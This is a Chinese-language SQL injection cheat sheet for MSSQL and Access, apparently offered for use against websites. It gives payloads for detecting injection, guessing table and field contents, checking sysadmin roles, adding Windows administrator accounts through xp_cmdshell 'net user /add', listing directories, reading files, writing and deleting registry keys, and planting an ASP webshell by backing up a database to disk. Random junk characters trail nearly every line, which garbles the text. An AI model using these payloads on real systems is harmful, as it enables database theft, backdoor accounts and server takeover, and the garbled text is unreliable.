1.判断是否有注入;and 1=1 ;and 1=2 ]JOephX2R
2.初步判断是否是mssql ;and user>0 24#bMt#^
z< z*Wz
3.注入参数是字符'and [查询条件] and ''=' 3pvYi<<D'
!X^Hi=aV
4.搜索时没过滤参数的'and [查询条件] and '%25'=' :6XguU
/\na;GI$
5.判断数据库系统 M70c{s`w5
l0I}&,+
;and (select count(*) from sysobjects)>0 mssql vt//)*(.$
ujU=JlJ7dl
;and (select count(*) from msysobjects)>0 access g %f*ofb
&J_Z~^
Y RPm^kW
7 _`L$<-n
6.猜数据库 ;and (select Count(*) from [数据库名])>0 J , V
pgT9hle/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [`d$X^<y;
m9Ax\lf
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -;^;2#](g
pe9@N9_5
9.(1)猜字段的ascii值(access) d')-7C
gw"~RV0
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ][,4,?T7
BT]ua]T+
(2)猜字段的ascii值(mssql) 0o;O`/x
!=3Rg-'d1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Guh%eR'Wt
rz6uDJ"
10.测试权限结构(mssql) :p' VbQZ{
qz 9tr
~3gru>qI&
wJgX/W
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- QdQd(4/1
SyO79e*t
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- h{k_6ym
h4/X
0@l`
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tAjx\7IX
b.b@bq$1
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2jl)mL
bLqy!QE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
B$^7h!
R[LsE^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- i(*I@ku
*5e+@rD`
;and 1=(select IS_MEMBER('db_owner'));-- rz%<AF Z
YzAFC11,
Po(]rQbE
9GgA 6#
11.添加mssql和系统的帐户 q_ %cbAcD
$+cAg>
;exec master.dbo.sp_addlogin username;-- &-%X:~|:X
;exec master.dbo.sp_password null,username,password;-- *XbI#L%>
w(j^ccPD
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ubYG
'xnnLCm.
;exec master.dbo.xp_cmdshell 'net user username password X<]qU3k5
XX6 T$pA6
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :~zv t
/4$4h;_8
;exec master.dbo.xp_cmdshell 'net user username password /add';-- M\oTZ@
Sw8kIC
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- WA$JI@g
^N{ltgQY
aE|OTm+@9;
N8v'70
12.(1)遍历目录 -kp swP
""{|3XJe
;create table dirs(paths varchar(100), id int) Wkzs<y"
y{d^?(-
;insert dirs exec master.dbo.xp_dirtree 'c:\' ~>5#5!}@*
at|g%$%
;and (select top 1 paths from dirs)>0 6_gnEve
h
15{Y9!
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) GKiukX$'
~ttY(wCV
g>
S*<
4f^C\i+q
(2)遍历目录 pI;NL
[
8i}<
k$S
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- GX&b;N
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U47}QDh
4v'A\~ZU
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ^V3v{>D>
0)!Ll*L!p
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &\C [@_
VR5fqf|*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 (*\jbK
i)ASsYG!
k+^'?D--'P
in-C/m#
13.mssql中的存储过程 Q;u SWt<{
U__(;
/1;
xp_regenumvalues 注册表根键, 子键 ZJ,cQ+fn
Thr*^0$C
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 7@}$|u:JUF
8K9$,Ii
xp_regread 根键,子键,键值名 Ucdj4[/,h
T]T;$
;exec xp_regread }_
mT
l@*
4~z?"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Bi3+)k>u7
Pw0Ci
xp_regwrite 根键,子键, 值名, 值类型, 值 ?=;qK{)37
^Q+i=y{W
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 i/So6jW
]@^coj[
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Xz 4 x
lb*8G
xp_regdeletevalue 根键,子键,值名 ww k
P F
KvPX=/&Zu
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 BV`- =wRC
B;K`q
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
IJIzXU
zTbVp8\pI
C0*@0~8$9
hsKmnH@#
14.mssql的backup创建webshell fV:4#j
D4JLtB'=
use model TXXy\$
4Kwh?8.
create table cmd(str image); 7OCwG~_^
;Xvp6.:
insert into cmd(str) values (''); _c$9eAe
'1^B+m
backup database model to disk='c:\l.asp'; X^9d/}uTa
fq[;%cr4
;a{ :%t
Ez~'^s@
15.mssql内置函数 \dQx+f&t
RP5+d
;and (select @@version)>0 获得Windows的版本号 gk[{2HgN
VdSv
;and user_name()='dbo' 判断当前系统的连接用户是不是sa WKz>
!E%
P^`duZ{T
;and (select user_name())>0 爆当前系统的连接用户 -u!FOD/
`1OgYs
;and (select db_name())>0 得到当前连接的数据库 2lKV#9"
?E%ELs_Dl
k67a'pmyJ
"1`Oh<={b
16.简洁的webshell PQKaqv}N
.`<@m]m-
use model SUKxkc(
qn1255fB
create table cmd(str image); 73#x|lY
[YrHA~=U
insert into cmd(str) values (''); %1 vsN-O}8
C;QAT
backup database model to disk='g:\wwwtest\l.asp';